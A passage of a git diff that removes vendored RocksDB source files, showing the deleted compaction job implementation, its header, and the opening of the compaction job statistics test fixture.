-    RecordTick(stats_, COMPACTION_KEY_DROP_NEWER_ENTRY,
-               c_iter_stats.num_record_drop_hidden);
-    if (compaction_job_stats) {
-      compaction_job_stats->num_records_replaced +=
-          c_iter_stats.num_record_drop_hidden;
-    }
-  }
-  if (c_iter_stats.num_record_drop_obsolete > 0) {
-    RecordTick(stats_, COMPACTION_KEY_DROP_OBSOLETE,
-               c_iter_stats.num_record_drop_obsolete);
-    if (compaction_job_stats) {
-      compaction_job_stats->num_expired_deletion_records +=
-          c_iter_stats.num_record_drop_obsolete;
-    }
-  }
-  if (c_iter_stats.num_record_drop_range_del > 0) {
-    RecordTick(stats_, COMPACTION_KEY_DROP_RANGE_DEL,
-               c_iter_stats.num_record_drop_range_del);
-  }
-  if (c_iter_stats.num_range_del_drop_obsolete > 0) {
-    RecordTick(stats_, COMPACTION_RANGE_DEL_DROP_OBSOLETE,
-               c_iter_stats.num_range_del_drop_obsolete);
-  }
-  if (c_iter_stats.num_optimized_del_drop_obsolete > 0) {
-    RecordTick(stats_, COMPACTION_OPTIMIZED_DEL_DROP_OBSOLETE,
-               c_iter_stats.num_optimized_del_drop_obsolete);
-  }
-}
-
-Status CompactionJob::FinishCompactionOutputFile(
-    const Status& input_status, SubcompactionState* sub_compact,
-    RangeDelAggregator* range_del_agg,
-    CompactionIterationStats* range_del_out_stats,
-    const Slice* next_table_min_key /* = nullptr */) {
-  AutoThreadOperationStageUpdater stage_updater(
-      ThreadStatus::STAGE_COMPACTION_SYNC_FILE);
-  assert(sub_compact != nullptr);
-  assert(sub_compact->outfile);
-  assert(sub_compact->builder != nullptr);
-  assert(sub_compact->current_output() != nullptr);
-
-  uint64_t output_number = sub_compact->current_output()->meta.fd.GetNumber();
-  assert(output_number != 0);
-
-  // Check for iterator errors
-  Status s = input_status;
-  auto meta = &sub_compact->current_output()->meta;
-  if (s.ok()) {
-    Slice lower_bound_guard, upper_bound_guard;
-    const Slice *lower_bound, *upper_bound;
-    if (sub_compact->outputs.size() == 1) {
-      // For the first output table, include range tombstones before the min key
-      // but after the subcompaction boundary.
-      lower_bound = sub_compact->start;
-    } else if (meta->smallest.size() > 0) {
-      // For subsequent output tables, only include range tombstones from min
-      // key onwards since the previous file was extended to contain range
-      // tombstones falling before min key.
-      lower_bound_guard = meta->smallest.user_key();
-      lower_bound = &lower_bound_guard;
-    } else {
-      lower_bound = nullptr;
-    }
-    if (next_table_min_key != nullptr) {
-      // This isn't the last file in the subcompaction, so extend until the next
-      // file starts.
-      upper_bound_guard = ExtractUserKey(*next_table_min_key);
-      upper_bound = &upper_bound_guard;
-    } else {
-      // This is the last file in the subcompaction, so extend until the
-      // subcompaction ends.
-      upper_bound = sub_compact->end;
-    }
-    range_del_agg->AddToBuilder(sub_compact->builder.get(), lower_bound,
-                                upper_bound, meta, range_del_out_stats,
-                                bottommost_level_);
-  }
-  const uint64_t current_entries = sub_compact->builder->NumEntries();
-  meta->marked_for_compaction = sub_compact->builder->NeedCompact();
-  if (s.ok()) {
-    s = sub_compact->builder->Finish();
-  } else {
-    sub_compact->builder->Abandon();
-  }
-  const uint64_t current_bytes = sub_compact->builder->FileSize();
-  meta->fd.file_size = current_bytes;
-  sub_compact->current_output()->finished = true;
-  sub_compact->total_bytes += current_bytes;
-
-  // Finish and check for file errors
-  if (s.ok()) {
-    StopWatch sw(env_, stats_, COMPACTION_OUTFILE_SYNC_MICROS);
-    s = sub_compact->outfile->Sync(db_options_.use_fsync);
-  }
-  if (s.ok()) {
-    s = sub_compact->outfile->Close();
-  }
-  sub_compact->outfile.reset();
-
-  if (s.ok() && current_entries == 0) {
-    // If there is nothing to output, no necessary to generate a sst file.
-    // This happens when the output level is bottom level, at the same time
-    // the sub_compact output nothing.
-    std::string fname = TableFileName(
-        db_options_.db_paths, meta->fd.GetNumber(), meta->fd.GetPathId());
-    env_->DeleteFile(fname);
-
-    // Also need to remove the file from outputs, or it will be added to the
-    // VersionEdit.
-    assert(!sub_compact->outputs.empty());
-    sub_compact->outputs.pop_back();
-    sub_compact->builder.reset();
-    sub_compact->current_output_file_size = 0;
-    return s;
-  }
-
-  ColumnFamilyData* cfd = sub_compact->compaction->column_family_data();
-  TableProperties tp;
-  if (s.ok() && current_entries > 0) {
-    // Verify that the table is usable
-    // We set for_compaction to false and don't OptimizeForCompactionTableRead
-    // here because this is a special case after we finish the table building
-    // No matter whether use_direct_io_for_flush_and_compaction is true,
-    // we will regrad this verification as user reads since the goal is
-    // to cache it here for further user reads
-    InternalIterator* iter = cfd->table_cache()->NewIterator(
-        ReadOptions(), env_options_, cfd->internal_comparator(), meta->fd,
-        nullptr /* range_del_agg */, nullptr,
-        cfd->internal_stats()->GetFileReadHist(
-            compact_->compaction->output_level()),
-        false);
-    s = iter->status();
-
-    if (s.ok() && paranoid_file_checks_) {
-      for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {}
-      s = iter->status();
-    }
-
-    delete iter;
-
-    // Output to event logger and fire events.
-    if (s.ok()) {
-      tp = sub_compact->builder->GetTableProperties();
-      sub_compact->current_output()->table_properties =
-          std::make_shared<TableProperties>(tp);
-      ROCKS_LOG_INFO(db_options_.info_log,
-                     "[%s] [JOB %d] Generated table #%" PRIu64 ": %" PRIu64
-                     " keys, %" PRIu64 " bytes%s",
-                     cfd->GetName().c_str(), job_id_, output_number,
-                     current_entries, current_bytes,
-                     meta->marked_for_compaction ? " (need compaction)" : "");
-    }
-  }
-  std::string fname = TableFileName(db_options_.db_paths, meta->fd.GetNumber(),
-                                    meta->fd.GetPathId());
-  EventHelpers::LogAndNotifyTableFileCreationFinished(
-      event_logger_, cfd->ioptions()->listeners, dbname_, cfd->GetName(), fname,
-      job_id_, meta->fd, tp, TableFileCreationReason::kCompaction, s);
-
-#ifndef ROCKSDB_LITE
-  // Report new file to SstFileManagerImpl
-  auto sfm =
-      static_cast<SstFileManagerImpl*>(db_options_.sst_file_manager.get());
-  if (sfm && meta->fd.GetPathId() == 0) {
-    auto fn = TableFileName(cfd->ioptions()->db_paths, meta->fd.GetNumber(),
-                            meta->fd.GetPathId());
-    sfm->OnAddFile(fn);
-    if (sfm->IsMaxAllowedSpaceReached()) {
-      // TODO(ajkr): should we return OK() if max space was reached by the final
-      // compaction output file (similarly to how flush works when full)?
-      s = Status::IOError("Max allowed space was reached");
-      TEST_SYNC_POINT(
-          "CompactionJob::FinishCompactionOutputFile:"
-          "MaxAllowedSpaceReached");
-      InstrumentedMutexLock l(db_mutex_);
-      if (db_bg_error_->ok()) {
-        Status new_bg_error = s;
-        // may temporarily unlock and lock the mutex.
-        EventHelpers::NotifyOnBackgroundError(
-            cfd->ioptions()->listeners, BackgroundErrorReason::kCompaction,
-            &new_bg_error, db_mutex_);
-        if (!new_bg_error.ok()) {
-          *db_bg_error_ = new_bg_error;
-        }
-      }
-    }
-  }
-#endif
-
-  sub_compact->builder.reset();
-  sub_compact->current_output_file_size = 0;
-  return s;
-}
-
-Status CompactionJob::InstallCompactionResults(
-    const MutableCFOptions& mutable_cf_options) {
-  db_mutex_->AssertHeld();
-
-  auto* compaction = compact_->compaction;
-  // paranoia: verify that the files that we started with
-  // still exist in the current version and in the same original level.
-  // This ensures that a concurrent compaction did not erroneously
-  // pick the same files to compact_.
-  if (!versions_->VerifyCompactionFileConsistency(compaction)) {
-    Compaction::InputLevelSummaryBuffer inputs_summary;
-
-    ROCKS_LOG_ERROR(db_options_.info_log, "[%s] [JOB %d] Compaction %s aborted",
-                    compaction->column_family_data()->GetName().c_str(),
-                    job_id_, compaction->InputLevelSummary(&inputs_summary));
-    return Status::Corruption("Compaction input files inconsistent");
-  }
-
-  {
-    Compaction::InputLevelSummaryBuffer inputs_summary;
-    ROCKS_LOG_INFO(
-        db_options_.info_log, "[%s] [JOB %d] Compacted %s => %" PRIu64 " bytes",
-        compaction->column_family_data()->GetName().c_str(), job_id_,
-        compaction->InputLevelSummary(&inputs_summary), compact_->total_bytes);
-  }
-
-  // Add compaction outputs
-  compaction->AddInputDeletions(compact_->compaction->edit());
-
-  for (const auto& sub_compact : compact_->sub_compact_states) {
-    for (const auto& out : sub_compact.outputs) {
-      compaction->edit()->AddFile(compaction->output_level(), out.meta);
-    }
-  }
-  return versions_->LogAndApply(compaction->column_family_data(),
-                                mutable_cf_options, compaction->edit(),
-                                db_mutex_, db_directory_);
-}
-
-void CompactionJob::RecordCompactionIOStats() {
-  RecordTick(stats_, COMPACT_READ_BYTES, IOSTATS(bytes_read));
-  ThreadStatusUtil::IncreaseThreadOperationProperty(
-      ThreadStatus::COMPACTION_BYTES_READ, IOSTATS(bytes_read));
-  IOSTATS_RESET(bytes_read);
-  RecordTick(stats_, COMPACT_WRITE_BYTES, IOSTATS(bytes_written));
-  ThreadStatusUtil::IncreaseThreadOperationProperty(
-      ThreadStatus::COMPACTION_BYTES_WRITTEN, IOSTATS(bytes_written));
-  IOSTATS_RESET(bytes_written);
-}
-
-Status CompactionJob::OpenCompactionOutputFile(
-    SubcompactionState* sub_compact) {
-  assert(sub_compact != nullptr);
-  assert(sub_compact->builder == nullptr);
-  // no need to lock because VersionSet::next_file_number_ is atomic
-  uint64_t file_number = versions_->NewFileNumber();
-  std::string fname = TableFileName(db_options_.db_paths, file_number,
-                                    sub_compact->compaction->output_path_id());
-  // Fire events.
-  ColumnFamilyData* cfd = sub_compact->compaction->column_family_data();
-#ifndef ROCKSDB_LITE
-  EventHelpers::NotifyTableFileCreationStarted(
-      cfd->ioptions()->listeners, dbname_, cfd->GetName(), fname, job_id_,
-      TableFileCreationReason::kCompaction);
-#endif  // !ROCKSDB_LITE
-  // Make the output file
-  unique_ptr<WritableFile> writable_file;
-  EnvOptions opt_env_opts =
-      env_->OptimizeForCompactionTableWrite(env_options_, db_options_);
-  TEST_SYNC_POINT_CALLBACK("CompactionJob::OpenCompactionOutputFile",
-                           &opt_env_opts.use_direct_writes);
-  Status s = NewWritableFile(env_, fname, &writable_file, opt_env_opts);
-  if (!s.ok()) {
-    ROCKS_LOG_ERROR(
-        db_options_.info_log,
-        "[%s] [JOB %d] OpenCompactionOutputFiles for table #%" PRIu64
-        " fails at NewWritableFile with status %s",
-        sub_compact->compaction->column_family_data()->GetName().c_str(),
-        job_id_, file_number, s.ToString().c_str());
-    LogFlush(db_options_.info_log);
-    EventHelpers::LogAndNotifyTableFileCreationFinished(
-        event_logger_, cfd->ioptions()->listeners, dbname_, cfd->GetName(),
-        fname, job_id_, FileDescriptor(), TableProperties(),
-        TableFileCreationReason::kCompaction, s);
-    return s;
-  }
-
-  SubcompactionState::Output out;
-  out.meta.fd =
-      FileDescriptor(file_number, sub_compact->compaction->output_path_id(), 0);
-  out.finished = false;
-
-  sub_compact->outputs.push_back(out);
-  writable_file->SetIOPriority(Env::IO_LOW);
-  writable_file->SetPreallocationBlockSize(static_cast<size_t>(
-      sub_compact->compaction->OutputFilePreallocationSize()));
-  sub_compact->outfile.reset(new WritableFileWriter(
-      std::move(writable_file), env_options_, db_options_.statistics.get()));
-
-  // If the Column family flag is to only optimize filters for hits,
-  // we can skip creating filters if this is the bottommost_level where
-  // data is going to be found
-  bool skip_filters =
-      cfd->ioptions()->optimize_filters_for_hits && bottommost_level_;
-
-  uint64_t output_file_creation_time =
-      sub_compact->compaction->MaxInputFileCreationTime();
-  if (output_file_creation_time == 0) {
-    int64_t _current_time = 0;
-    db_options_.env->GetCurrentTime(&_current_time);  // ignore error
-    output_file_creation_time = static_cast<uint64_t>(_current_time);
-  }
-
-  sub_compact->builder.reset(NewTableBuilder(
-      *cfd->ioptions(), cfd->internal_comparator(),
-      cfd->int_tbl_prop_collector_factories(), cfd->GetID(), cfd->GetName(),
-      sub_compact->outfile.get(), sub_compact->compaction->output_compression(),
-      cfd->ioptions()->compression_opts,
-      sub_compact->compaction->output_level(), &sub_compact->compression_dict,
-      skip_filters, output_file_creation_time));
-  LogFlush(db_options_.info_log);
-  return s;
-}
-
-void CompactionJob::CleanupCompaction() {
-  for (SubcompactionState& sub_compact : compact_->sub_compact_states) {
-    const auto& sub_status = sub_compact.status;
-
-    if (sub_compact.builder != nullptr) {
-      // May happen if we get a shutdown call in the middle of compaction
-      sub_compact.builder->Abandon();
-      sub_compact.builder.reset();
-    } else {
-      assert(!sub_status.ok() || sub_compact.outfile == nullptr);
-    }
-    for (const auto& out : sub_compact.outputs) {
-      // If this file was inserted into the table cache then remove
-      // them here because this compaction was not committed.
-      if (!sub_status.ok()) {
-        TableCache::Evict(table_cache_.get(), out.meta.fd.GetNumber());
-      }
-    }
-  }
-  delete compact_;
-  compact_ = nullptr;
-}
-
-#ifndef ROCKSDB_LITE
-namespace {
-void CopyPrefix(
-    const Slice& src, size_t prefix_length, std::string* dst) {
-  assert(prefix_length > 0);
-  size_t length = src.size() > prefix_length ? prefix_length : src.size();
-  dst->assign(src.data(), length);
-}
-}  // namespace
-
-#endif  // !ROCKSDB_LITE
-
-void CompactionJob::UpdateCompactionStats() {
-  Compaction* compaction = compact_->compaction;
-  compaction_stats_.num_input_files_in_non_output_levels = 0;
-  compaction_stats_.num_input_files_in_output_level = 0;
-  for (int input_level = 0;
-       input_level < static_cast<int>(compaction->num_input_levels());
-       ++input_level) {
-    if (compaction->level(input_level) != compaction->output_level()) {
-      UpdateCompactionInputStatsHelper(
-          &compaction_stats_.num_input_files_in_non_output_levels,
-          &compaction_stats_.bytes_read_non_output_levels,
-          input_level);
-    } else {
-      UpdateCompactionInputStatsHelper(
-          &compaction_stats_.num_input_files_in_output_level,
-          &compaction_stats_.bytes_read_output_level,
-          input_level);
-    }
-  }
-
-  for (const auto& sub_compact : compact_->sub_compact_states) {
-    size_t num_output_files = sub_compact.outputs.size();
-    if (sub_compact.builder != nullptr) {
-      // An error occurred so ignore the last output.
-      assert(num_output_files > 0);
-      --num_output_files;
-    }
-    compaction_stats_.num_output_files += static_cast<int>(num_output_files);
-
-    for (const auto& out : sub_compact.outputs) {
-      compaction_stats_.bytes_written += out.meta.fd.file_size;
-    }
-    if (sub_compact.num_input_records > sub_compact.num_output_records) {
-      compaction_stats_.num_dropped_records +=
-          sub_compact.num_input_records - sub_compact.num_output_records;
-    }
-  }
-}
-
-void CompactionJob::UpdateCompactionInputStatsHelper(
-    int* num_files, uint64_t* bytes_read, int input_level) {
-  const Compaction* compaction = compact_->compaction;
-  auto num_input_files = compaction->num_input_files(input_level);
-  *num_files += static_cast<int>(num_input_files);
-
-  for (size_t i = 0; i < num_input_files; ++i) {
-    const auto* file_meta = compaction->input(input_level, i);
-    *bytes_read += file_meta->fd.GetFileSize();
-    compaction_stats_.num_input_records +=
-        static_cast<uint64_t>(file_meta->num_entries);
-  }
-}
-
-void CompactionJob::UpdateCompactionJobStats(
-    const InternalStats::CompactionStats& stats) const {
-#ifndef ROCKSDB_LITE
-  if (compaction_job_stats_) {
-    compaction_job_stats_->elapsed_micros = stats.micros;
-
-    // input information
-    compaction_job_stats_->total_input_bytes =
-        stats.bytes_read_non_output_levels +
-        stats.bytes_read_output_level;
-    compaction_job_stats_->num_input_records =
-        compact_->num_input_records;
-    compaction_job_stats_->num_input_files =
-        stats.num_input_files_in_non_output_levels +
-        stats.num_input_files_in_output_level;
-    compaction_job_stats_->num_input_files_at_output_level =
-        stats.num_input_files_in_output_level;
-
-    // output information
-    compaction_job_stats_->total_output_bytes = stats.bytes_written;
-    compaction_job_stats_->num_output_records =
-        compact_->num_output_records;
-    compaction_job_stats_->num_output_files = stats.num_output_files;
-
-    if (compact_->NumOutputFiles() > 0U) {
-      CopyPrefix(
-          compact_->SmallestUserKey(),
-          CompactionJobStats::kMaxPrefixLength,
-          &compaction_job_stats_->smallest_output_key_prefix);
-      CopyPrefix(
-          compact_->LargestUserKey(),
-          CompactionJobStats::kMaxPrefixLength,
-          &compaction_job_stats_->largest_output_key_prefix);
-    }
-  }
-#endif  // !ROCKSDB_LITE
-}
-
-void CompactionJob::LogCompaction() {
-  Compaction* compaction = compact_->compaction;
-  ColumnFamilyData* cfd = compaction->column_family_data();
-
-  // Let's check if anything will get logged. Don't prepare all the info if
-  // we're not logging
-  if (db_options_.info_log_level <= InfoLogLevel::INFO_LEVEL) {
-    Compaction::InputLevelSummaryBuffer inputs_summary;
-    ROCKS_LOG_INFO(
-        db_options_.info_log, "[%s] [JOB %d] Compacting %s, score %.2f",
-        cfd->GetName().c_str(), job_id_,
-        compaction->InputLevelSummary(&inputs_summary), compaction->score());
-    char scratch[2345];
-    compaction->Summary(scratch, sizeof(scratch));
-    ROCKS_LOG_INFO(db_options_.info_log, "[%s] Compaction start summary: %s\n",
-                   cfd->GetName().c_str(), scratch);
-    // build event logger report
-    auto stream = event_logger_->Log();
-    stream << "job" << job_id_ << "event"
-           << "compaction_started";
-    for (size_t i = 0; i < compaction->num_input_levels(); ++i) {
-      stream << ("files_L" + ToString(compaction->level(i)));
-      stream.StartArray();
-      for (auto f : *compaction->inputs(i)) {
-        stream << f->fd.GetNumber();
-      }
-      stream.EndArray();
-    }
-    stream << "score" << compaction->score() << "input_data_size"
-           << compaction->CalculateTotalInputSize();
-  }
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/compaction_job.h b/thirdparty/rocksdb/db/compaction_job.h
deleted file mode 100644
index 6ca5d62..0000000
--- a/thirdparty/rocksdb/db/compaction_job.h
+++ /dev/null
@@ -1,165 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#pragma once
-
-#include <atomic>
-#include <deque>
-#include <functional>
-#include <limits>
-#include <set>
-#include <string>
-#include <utility>
-#include <vector>
-
-#include "db/column_family.h"
-#include "db/compaction_iterator.h"
-#include "db/dbformat.h"
-#include "db/flush_scheduler.h"
-#include "db/internal_stats.h"
-#include "db/job_context.h"
-#include "db/log_writer.h"
-#include "db/memtable_list.h"
-#include "db/range_del_aggregator.h"
-#include "db/version_edit.h"
-#include "db/write_controller.h"
-#include "db/write_thread.h"
-#include "options/db_options.h"
-#include "port/port.h"
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/compaction_job_stats.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/memtablerep.h"
-#include "rocksdb/transaction_log.h"
-#include "table/scoped_arena_iterator.h"
-#include "util/autovector.h"
-#include "util/event_logger.h"
-#include "util/stop_watch.h"
-#include "util/thread_local.h"
-
-namespace rocksdb {
-
-class MemTable;
-class TableCache;
-class Version;
-class VersionEdit;
-class VersionSet;
-class Arena;
-
-class CompactionJob {
- public:
-  CompactionJob(int job_id, Compaction* compaction,
-                const ImmutableDBOptions& db_options,
-                const EnvOptions& env_options, VersionSet* versions,
-                const std::atomic<bool>* shutting_down, LogBuffer* log_buffer,
-                Directory* db_directory, Directory* output_directory,
-                Statistics* stats, InstrumentedMutex* db_mutex,
-                Status* db_bg_error,
-                std::vector<SequenceNumber> existing_snapshots,
-                SequenceNumber earliest_write_conflict_snapshot,
-                std::shared_ptr<Cache> table_cache, EventLogger* event_logger,
-                bool paranoid_file_checks, bool measure_io_stats,
-                const std::string& dbname,
-                CompactionJobStats* compaction_job_stats);
-
-  ~CompactionJob();
-
-  // no copy/move
-  CompactionJob(CompactionJob&& job) = delete;
-  CompactionJob(const CompactionJob& job) = delete;
-  CompactionJob& operator=(const CompactionJob& job) = delete;
-
-  // REQUIRED: mutex held
-  void Prepare();
-  // REQUIRED mutex not held
-  Status Run();
-
-  // REQUIRED: mutex held
-  Status Install(const MutableCFOptions& mutable_cf_options);
-
- private:
-  struct SubcompactionState;
-
-  void AggregateStatistics();
-  void GenSubcompactionBoundaries();
-
-  // update the thread status for starting a compaction.
-  void ReportStartedCompaction(Compaction* compaction);
-  void AllocateCompactionOutputFileNumbers();
-  // Call compaction filter. Then iterate through input and compact the
-  // kv-pairs
-  void ProcessKeyValueCompaction(SubcompactionState* sub_compact);
-
-  Status FinishCompactionOutputFile(
-      const Status& input_status, SubcompactionState* sub_compact,
-      RangeDelAggregator* range_del_agg,
-      CompactionIterationStats* range_del_out_stats,
-      const Slice* next_table_min_key = nullptr);
-  Status InstallCompactionResults(const MutableCFOptions& mutable_cf_options);
-  void RecordCompactionIOStats();
-  Status OpenCompactionOutputFile(SubcompactionState* sub_compact);
-  void CleanupCompaction();
-  void UpdateCompactionJobStats(
-    const InternalStats::CompactionStats& stats) const;
-  void RecordDroppedKeys(const CompactionIterationStats& c_iter_stats,
-                         CompactionJobStats* compaction_job_stats = nullptr);
-
-  void UpdateCompactionStats();
-  void UpdateCompactionInputStatsHelper(
-      int* num_files, uint64_t* bytes_read, int input_level);
-
-  void LogCompaction();
-
-  int job_id_;
-
-  // CompactionJob state
-  struct CompactionState;
-  CompactionState* compact_;
-  CompactionJobStats* compaction_job_stats_;
-  InternalStats::CompactionStats compaction_stats_;
-
-  // DBImpl state
-  const std::string& dbname_;
-  const ImmutableDBOptions& db_options_;
-  const EnvOptions& env_options_;
-
-  Env* env_;
-  VersionSet* versions_;
-  const std::atomic<bool>* shutting_down_;
-  LogBuffer* log_buffer_;
-  Directory* db_directory_;
-  Directory* output_directory_;
-  Statistics* stats_;
-  InstrumentedMutex* db_mutex_;
-  Status* db_bg_error_;
-  // If there were two snapshots with seq numbers s1 and
-  // s2 and s1 < s2, and if we find two instances of a key k1 then lies
-  // entirely within s1 and s2, then the earlier version of k1 can be safely
-  // deleted because that version is not visible in any snapshot.
-  std::vector<SequenceNumber> existing_snapshots_;
-
-  // This is the earliest snapshot that could be used for write-conflict
-  // checking by a transaction.  For any user-key newer than this snapshot, we
-  // should make sure not to remove evidence that a write occurred.
-  SequenceNumber earliest_write_conflict_snapshot_;
-
-  std::shared_ptr<Cache> table_cache_;
-
-  EventLogger* event_logger_;
-
-  bool bottommost_level_;
-  bool paranoid_file_checks_;
-  bool measure_io_stats_;
-  // Stores the Slices that designate the boundaries for each subcompaction
-  std::vector<Slice> boundaries_;
-  // Stores the approx size of keys covered in the range of each subcompaction
-  std::vector<uint64_t> sizes_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/compaction_job_stats_test.cc b/thirdparty/rocksdb/db/compaction_job_stats_test.cc
deleted file mode 100644
index 9a8372f..0000000
--- a/thirdparty/rocksdb/db/compaction_job_stats_test.cc
+++ /dev/null
@@ -1,1047 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <algorithm>
-#include <iostream>
-#include <mutex>
-#include <queue>
-#include <set>
-#include <thread>
-#include <unordered_set>
-#include <utility>
-
-#include "db/db_impl.h"
-#include "db/dbformat.h"
-#include "db/job_context.h"
-#include "db/version_set.h"
-#include "db/write_batch_internal.h"
-#include "env/mock_env.h"
-#include "memtable/hash_linklist_rep.h"
-#include "monitoring/statistics.h"
-#include "monitoring/thread_status_util.h"
-#include "port/stack_trace.h"
-#include "rocksdb/cache.h"
-#include "rocksdb/compaction_filter.h"
-#include "rocksdb/convenience.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/experimental.h"
-#include "rocksdb/filter_policy.h"
-#include "rocksdb/options.h"
-#include "rocksdb/perf_context.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/table.h"
-#include "rocksdb/table_properties.h"
-#include "rocksdb/thread_status.h"
-#include "rocksdb/utilities/checkpoint.h"
-#include "rocksdb/utilities/write_batch_with_index.h"
-#include "table/block_based_table_factory.h"
-#include "table/mock_table.h"
-#include "table/plain_table_factory.h"
-#include "table/scoped_arena_iterator.h"
-#include "util/compression.h"
-#include "util/filename.h"
-#include "util/hash.h"
-#include "util/logging.h"
-#include "util/mutexlock.h"
-#include "util/rate_limiter.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-#include "utilities/merge_operators.h"
-
-#if !defined(IOS_CROSS_COMPILE)
-#ifndef ROCKSDB_LITE
-namespace rocksdb {
-
-static std::string RandomString(Random* rnd, int len, double ratio) {
-  std::string r;
-  test::CompressibleString(rnd, ratio, len, &r);
-  return r;
-}
-
-std::string Key(uint64_t key, int length) {
-  const int kBufSize = 1000;
-  char buf[kBufSize];
-  if (length > kBufSize) {
-    length = kBufSize;
-  }
-  snprintf(buf, kBufSize, "%0*" PRIu64, length, key);
-  return std::string(buf);
-}
-
-class CompactionJobStatsTest : public testing::Test,
-                               public testing::WithParamInterface<bool> {
- public:
-  std::string dbname_;
-  std::string alternative_wal_dir_;
-  Env* env_;
-  DB* db_;
-  std::vector<ColumnFamilyHandle*> handles_;
-  uint32_t max_subcompactions_;
-
-  Options last_options_;
-
-  CompactionJobStatsTest() : env_(Env::Default()) {
-    env_->SetBackgroundThreads(1, Env::LOW);
-    env_->SetBackgroundThreads(1, Env::HIGH);
-    dbname_ = test::TmpDir(env_) + "/compaction_job_stats_test";
-    alternative_wal_dir_ = dbname_ + "/wal";
-    Options options;
-    options.create_if_missing = true;
-    max_subcompactions_ = GetParam();
-    options.max_subcompactions = max_subcompactions_;
-    auto delete_options = options;
-    delete_options.wal_dir = alternative_wal_dir_;
-    EXPECT_OK(DestroyDB(dbname_, delete_options));
-    // Destroy it for not alternative WAL dir is used.
-    EXPECT_OK(DestroyDB(dbname_, options));
-    db_ = nullptr;
-    Reopen(options);
-  }
-
-  ~CompactionJobStatsTest() {
-    rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-    rocksdb::SyncPoint::GetInstance()->LoadDependency({});
-    rocksdb::SyncPoint::GetInstance()->ClearAllCallBacks();
-    Close();
-    Options options;
-    options.db_paths.emplace_back(dbname_, 0);
-    options.db_paths.emplace_back(dbname_ + "_2", 0);
-    options.db_paths.emplace_back(dbname_ + "_3", 0);
-    options.db_paths.emplace_back(dbname_ + "_4", 0);
-    EXPECT_OK(DestroyDB(dbname_, options));
-  }
-
-  // Required if inheriting from testing::WithParamInterface<>
-  static void SetUpTestCase() {}
-  static void TearDownTestCase() {}
-
-  DBImpl* dbfull() {
-    return reinterpret_cast<DBImpl*>(db_);
-  }
-
-  void CreateColumnFamilies(const std::vector<std::string>& cfs,
-                            const Options& options) {
-    ColumnFamilyOptions cf_opts(options);
-    size_t cfi = handles_.size();
-    handles_.resize(cfi + cfs.size());
-    for (auto cf : cfs) {
-      ASSERT_OK(db_->CreateColumnFamily(cf_opts, cf, &handles_[cfi++]));
-    }
-  }
-
-  void CreateAndReopenWithCF(const std::vector<std::string>& cfs,
-                             const Options& options) {
-    CreateColumnFamilies(cfs, options);
-    std::vector<std::string> cfs_plus_default = cfs;
-    cfs_plus_default.insert(cfs_plus_default.begin(), kDefaultColumnFamilyName);
-    ReopenWithColumnFamilies(cfs_plus_default, options);
-  }
-
-  void ReopenWithColumnFamilies(const std::vector<std::string>& cfs,
-                                const std::vector<Options>& options) {
-    ASSERT_OK(TryReopenWithColumnFamilies(cfs, options));
-  }
-
-  void ReopenWithColumnFamilies(const std::vector<std::string>& cfs,
-                                const Options& options) {
-    ASSERT_OK(TryReopenWithColumnFamilies(cfs, options));
-  }
-
-  Status TryReopenWithColumnFamilies(
-      const std::vector<std::string>& cfs,
-      const std::vector<Options>& options) {
-    Close();
-    EXPECT_EQ(cfs.size(), options.size());
-    std::vector<ColumnFamilyDescriptor> column_families;
-    for (size_t i = 0; i < cfs.size(); ++i) {
-      column_families.push_back(ColumnFamilyDescriptor(cfs[i], options[i]));
-    }
-    DBOptions db_opts = DBOptions(options[0]);
-    return DB::Open(db_opts, dbname_, column_families, &handles_, &db_);
-  }
-
-  Status TryReopenWithColumnFamilies(const std::vector<std::string>& cfs,
-                                     const Options& options) {
-    Close();
-    std::vector<Options> v_opts(cfs.size(), options);
-    return TryReopenWithColumnFamilies(cfs, v_opts);
-  }
-
-  void Reopen(const Options& options) {
-    ASSERT_OK(TryReopen(options));
-  }
-
-  void Close() {
-    for (auto h : handles_) {
-      delete h;
-    }
-    handles_.clear();
-    delete db_;
-    db_ = nullptr;
-  }
-
-  void DestroyAndReopen(const Options& options) {
-    // Destroy using last options
-    Destroy(last_options_);
-    ASSERT_OK(TryReopen(options));
-  }
-
-  void Destroy(const Options& options) {
-    Close();
-    ASSERT_OK(DestroyDB(dbname_, options));
-  }
-
-  Status ReadOnlyReopen(const Options& options) {
-    return DB::OpenForReadOnly(options, dbname_, &db_);
-  }
-
-  Status TryReopen(const Options& options) {
-    Close();
-    last_options_ = options;
-    return DB::Open(options, dbname_, &db_);
-  }
-
-  Status Flush(int cf = 0) {
-    if (cf == 0) {
-      return db_->Flush(FlushOptions());
-    } else {
-      return db_->Flush(FlushOptions(), handles_[cf]);
-    }
-  }
-
-  Status Put(const Slice& k, const Slice& v, WriteOptions wo = WriteOptions()) {
-    return db_->Put(wo, k, v);
-  }
-
-  Status Put(int cf, const Slice& k, const Slice& v,
-             WriteOptions wo = WriteOptions()) {
-    return db_->Put(wo, handles_[cf], k, v);
-  }
-
-  Status Delete(const std::string& k) {
-    return db_->Delete(WriteOptions(), k);
-  }
-
